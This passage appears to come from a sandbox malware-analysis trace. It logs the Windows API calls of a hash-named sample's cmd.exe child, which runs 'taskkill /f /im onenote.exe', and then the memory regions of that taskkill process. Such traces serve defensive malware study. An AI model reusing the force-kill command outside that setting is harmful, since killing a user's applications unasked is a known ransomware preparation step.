_String2="PATH") returned 4 [0212.072] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0212.072] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0212.072] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0212.072] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0212.072] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0212.072] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0212.072] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0212.072] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0212.072] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0212.072] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0212.072] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0212.072] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0212.072] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0212.072] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0212.072] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0212.072] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0212.072] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0212.072] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0212.073] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0212.073] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0212.073] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0212.073] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0212.073] _wcsicmp (_String1="taskkill", _String2="FOR") returned 14 [0212.073] _wcsicmp (_String1="taskkill", _String2="IF") returned 11 [0212.073] _wcsicmp (_String1="taskkill", _String2="REM") returned 2 [0212.073] GetProcessHeap () returned 0x480000 [0212.073] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x210) returned 0x48ad38 [0212.073] GetProcessHeap () returned 0x480000 [0212.073] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x44) returned 0x48af50 [0212.073] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0212.074] GetProcessHeap () returned 0x480000 [0212.074] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x418) returned 0x4805c8 [0212.074] SetErrorMode (uMode=0x0) returned 0x8003 [0212.074] SetErrorMode (uMode=0x1) returned 0x0 [0212.074] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4805d0, lpFilePart=0x19f57c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19f57c*="Desktop") returned 0x1d [0212.074] SetErrorMode (uMode=0x8003) returned 0x1 [0212.074] GetProcessHeap () returned 0x480000 [0212.074] RtlReAllocateHeap (Heap=0x480000, Flags=0x0, Ptr=0x4805c8, Size=0x56) returned 0x4805c8 [0212.074] GetProcessHeap () returned 0x480000 [0212.074] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x4805c8) returned 0x56 [0212.074] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0212.074] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0212.074] GetProcessHeap () returned 0x480000 [0212.074] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x110) returned 0x48afa0 [0212.074] GetProcessHeap () returned 0x480000 [0212.074] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x218) returned 0x48b0b8 [0212.079] GetProcessHeap () returned 0x480000 [0212.079] RtlReAllocateHeap (Heap=0x480000, Flags=0x0, Ptr=0x48b0b8, Size=0x112) returned 0x48b0b8 [0212.079] GetProcessHeap () returned 0x480000 [0212.079] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x48b0b8) returned 0x112 [0212.079] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0212.079] GetProcessHeap () returned 0x480000 [0212.079] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0xe0) returned 0x48b1d8 [0212.081] GetProcessHeap () returned 0x480000 [0212.081] RtlReAllocateHeap (Heap=0x480000, Flags=0x0, Ptr=0x48b1d8, Size=0x76) returned 0x48b1d8 [0212.081] GetProcessHeap () returned 0x480000 [0212.081] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x48b1d8) returned 0x76 [0212.081] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0212.082] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0212.082] GetLastError () returned 0x2 [0212.082] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0212.082] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x48b258 [0212.083] GetProcessHeap () returned 0x480000 [0212.083] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x14) returned 0x487760 [0212.083] FindClose (in: hFindFile=0x48b258 | out: hFindFile=0x48b258) returned 1 [0212.083] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.COM", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0212.083] GetLastError () returned 0x2 [0212.083] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.EXE", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x48b258 [0212.083] GetProcessHeap () returned 0x480000 [0212.083] RtlReAllocateHeap (Heap=0x480000, Flags=0x0, Ptr=0x487760, Size=0x4) returned 0x487288 [0212.083] FindClose (in: hFindFile=0x48b258 | out: hFindFile=0x48b258) returned 1 [0212.083] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0212.083] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0212.084] GetConsoleTitleW (in: lpConsoleTitle=0x19f7fc, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0212.091] InitializeProcThreadAttributeList (in: lpAttributeList=0x19f728, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x19f70c | out: lpAttributeList=0x19f728, lpSize=0x19f70c) returned 1 [0212.091] UpdateProcThreadAttribute (in: lpAttributeList=0x19f728, dwFlags=0x0, Attribute=0x60001, lpValue=0x19f714, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x19f728, lpPreviousValue=0x0) returned 1 [0212.091] GetStartupInfoW (in: lpStartupInfo=0x19f760 | out: lpStartupInfo=0x19f760*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x130, hStdOutput=0x13c, hStdError=0x140)) [0212.091] GetProcessHeap () returned 0x480000 [0212.091] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x18) returned 0x4876c0 [0212.091] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0212.091] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0212.091] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0212.091] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0212.091] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0212.091] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0212.091] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0212.091] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0212.092] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0212.092] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0212.092] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0212.092] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0212.092] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0212.092] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0212.092] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0212.092] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0212.092] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0212.092] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0212.092] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0212.092] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0212.092] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0212.092] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0212.092] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0212.092] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0212.092] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0212.092] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0212.092] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0212.092] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0212.092] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0212.093] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0212.093] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0212.093] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0212.093] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0212.093] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0212.093] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0212.093] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0212.093] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0212.093] GetProcessHeap () returned 0x480000 [0212.093] RtlFreeHeap (HeapHandle=0x480000, Flags=0x0, BaseAddress=0x4876c0) returned 1 [0212.093] GetProcessHeap () returned 0x480000 [0212.093] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0xa) returned 0x48b258 [0212.093] lstrcmpW (lpString1="\\taskkill.exe", lpString2="\\XCOPY.EXE") returned -1 [0212.097] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\taskkill.exe", lpCommandLine="taskkill /f /im onenote.exe ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpStartupInfo=0x19f6b0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="taskkill /f /im onenote.exe ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19f6fc | out: lpCommandLine="taskkill /f /im onenote.exe ", lpProcessInformation=0x19f6fc*(hProcess=0x9c, hThread=0x98, dwProcessId=0xe58, dwThreadId=0xf88)) returned 1 [0212.123] CloseHandle (hObject=0x98) returned 1 [0212.123] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0212.123] GetProcessHeap () returned 0x480000 [0212.124] RtlFreeHeap (HeapHandle=0x480000, Flags=0x0, BaseAddress=0x489e60) returned 1 [0212.124] GetEnvironmentStringsW () returned 0x489e60* [0212.124] GetProcessHeap () returned 0x480000 [0212.124] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0xa76) returned 0x487fe8 [0212.124] FreeEnvironmentStringsA (penv="=") returned 1 [0212.125] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0xffffffff) returned 0x0 [0213.935] GetExitCodeProcess (in: hProcess=0x9c, lpExitCode=0x19f694 | out: lpExitCode=0x19f694*=0x80) returned 1 [0213.936] CloseHandle (hObject=0x9c) returned 1 [0213.937] _vsnwprintf (in: _Buffer=0x19f77c, _BufferCount=0x13, _Format="%08X", _ArgList=0x19f69c | out: _Buffer="00000080") returned 8 [0213.937] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000080") returned 1 [0213.937] GetProcessHeap () returned 0x480000 [0213.938] RtlFreeHeap (HeapHandle=0x480000, Flags=0x0, BaseAddress=0x487fe8) returned 1 [0213.938] GetEnvironmentStringsW () returned 0x48b288* [0213.938] GetProcessHeap () returned 0x480000 [0213.938] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0xa9c) returned 0x487fe8 [0213.938] FreeEnvironmentStringsA (penv="=") returned 1 [0213.938] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0213.939] GetProcessHeap () returned 0x480000 [0213.939] RtlFreeHeap (HeapHandle=0x480000, Flags=0x0, BaseAddress=0x487fe8) returned 1 [0213.939] GetEnvironmentStringsW () returned 0x48b288* [0213.939] GetProcessHeap () returned 0x480000 [0213.939] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0xa9c) returned 0x487fe8 [0213.939] FreeEnvironmentStringsA (penv="=") returned 1 [0213.939] GetProcessHeap () returned 0x480000 [0213.939] RtlFreeHeap (HeapHandle=0x480000, Flags=0x0, BaseAddress=0x48b258) returned 1 [0213.939] DeleteProcThreadAttributeList (in: lpAttributeList=0x19f728 | out: lpAttributeList=0x19f728) [0213.939] _get_osfhandle (_FileHandle=1) returned 0x13c [0213.940] SetConsoleMode (hConsoleHandle=0x13c, dwMode=0x0) returned 0 [0213.940] _get_osfhandle (_FileHandle=1) returned 0x13c [0213.940] GetConsoleMode (in: hConsoleHandle=0x13c, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0213.940] _get_osfhandle (_FileHandle=0) returned 0x130 [0213.940] GetConsoleMode (in: hConsoleHandle=0x130, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0213.940] GetConsoleOutputCP () returned 0x1b5 [0213.943] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0213.943] SetThreadUILanguage (LangId=0x0) returned 0x409 [0213.951] exit (_Code=128) Thread: id = 347 os_tid = 0xd9c Process: id = "66" image_name = "taskkill.exe" filename = "c:\\windows\\syswow64\\taskkill.exe" page_root = "0x2e822000" os_pid = "0xe58" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "65" os_parent_pid = "0xe6c" cmd_line = "taskkill /f /im onenote.exe " cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4791 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4792 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4793 start_va = 0x40000 end_va = 0x43fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4794 start_va = 0x50000 end_va = 0x65fff monitored = 0 entry_point = 0x5de80 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\SysWOW64\\taskkill.exe" (normalized: "c:\\windows\\syswow64\\taskkill.exe") Region: id = 4795 start_va = 0x70000 end_va = 0x406ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 4796 start_va = 0x4070000 end_va = 0x4084fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004070000" filename = "" Region: id = 4797 start_va = 0x4090000 end_va = 0x40cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004090000" filename = "" Region: id = 4798 start_va = 0x40d0000 end_va = 0x410ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040d0000" filename = "" Region: id = 4799 start_va = 0x4110000 end_va = 0x4110fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004110000" filename = "" Region: id = 4800 start_va = 0x4120000 end_va = 0x4121fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 4801 start_va = 0x4200000 end_va = 0x43fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004200000" filename = "" Region: id = 4802 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4803 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 4804 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4805 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4806 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 4807 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4808 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 4809 start_va = 0x45c0000 end_va = 0x45cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000045c0000" filename = "" Region: id = 4810 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4811 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4812 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4813 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4814 start_va = 0x4400000 end_va = 0x457ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 4815 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4816 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4817 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4818 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 4819 start_va = 0x4130000 end_va = 0x41edfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4820 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 4821 start_va = 0x74650000 end_va = 0x746cafff monitored = 0 entry_point = 0x7466e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 4822 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4823 start_va = 0x4400000 end_va = 0x443ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 4824 start_va = 0x4440000 end_va = 0x447ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004440000" filename = "" Region: id = 4825 start_va = 0x4480000 end_va = 0x457ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004480000" filename = "" Region: id = 4826 start_va = 0x76ae0000 end_va = 0x76b23fff monitored = 0 entry_point = 0x76af9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 4827 start_va = 0x75260000 end_va = 0x7530cfff monitored = 0 entry_point = 0x75274f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 4828 start_va = 0x74450000 end_va = 0x7446dfff monitored = 0 entry_point = 0x7445b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 4829 start_va = 0x74440000 end_va = 0x74449fff monitored = 0 entry_point = 0x74442a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 4830 start_va = 0x74590000 end_va = 0x745e7fff monitored = 0 entry_point = 0x745d25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 4831 start_va = 0x77450000 end_va = 0x77596fff monitored = 0 entry_point = 0x77461cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 4832 start_va = 0x76b30000 end_va = 0x76c7efff monitored = 0 entry_point = 0x76be6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 4833 start_va = 0x753c0000 end_va = 0x75451fff monitored = 0 entry_point = 0x753f8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 4834 start_va = 0x77290000 end_va = 0x7744cfff monitored = 0 entry_point = 0x77372a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 4835 start_va = 0x75310000 end_va = 0x7536efff monitored = 0 entry_point = 0x75314af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 4836 start_va = 0x77240000 end_va = 0x77284fff monitored = 0 entry_point = 0x7725de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 4837 start_va = 0x6cda0000 end_va = 0x6cda7fff monitored = 0 entry_point = 0x6cda17b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 4838 start_va = 0x6cd80000 end_va = 0x6cd95fff monitored = 0 entry_point = 0x6cd821d0 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 4839 start_va = 0x6ccb0000 end_va = 0x6cceefff monitored = 0 entry_point = 0x6ccc46c0 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 4840 start_va = 0x6c9a0000 end_va = 0x6cadefff monitored = 0 entry_point = 0x6c9cd880 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 4841 start_va = 0x6cd60000 end_va = 0x6cd7bfff monitored = 0 entry_point = 0x6cd64720 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 4842 start_va = 0x6cd50000 end_va = 0x6cd59fff monitored = 0 entry_point = 0x6cd528d0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 4843 start_va = 0x45d0000 end_va = 0x46fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000045d0000" filename = "" Region: id = 4844 start_va = 0x4580000 end_va = 0x45a9fff monitored = 0 entry_point = 0x4585680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 4845 start_va = 0x4700000 end_va = 0x4887fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004700000" filename = "" Region: id = 4846 start_va = 0x74ea0000 end_va = 0x74ecafff monitored = 0 entry_point = 0x74ea5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 4847 start_va = 0x4890000 end_va = 0x4a10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004890000" filename = "" Region: id = 4848 start_va = 0x4a20000 end_va = 0x5e1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004a20000" filename = "" Region: id = 4849 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 4850 start_va = 0x41f0000 end_va = 0x41f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000041f0000" filename = "" Region: id = 4851 start_va = 0x4580000 end_va 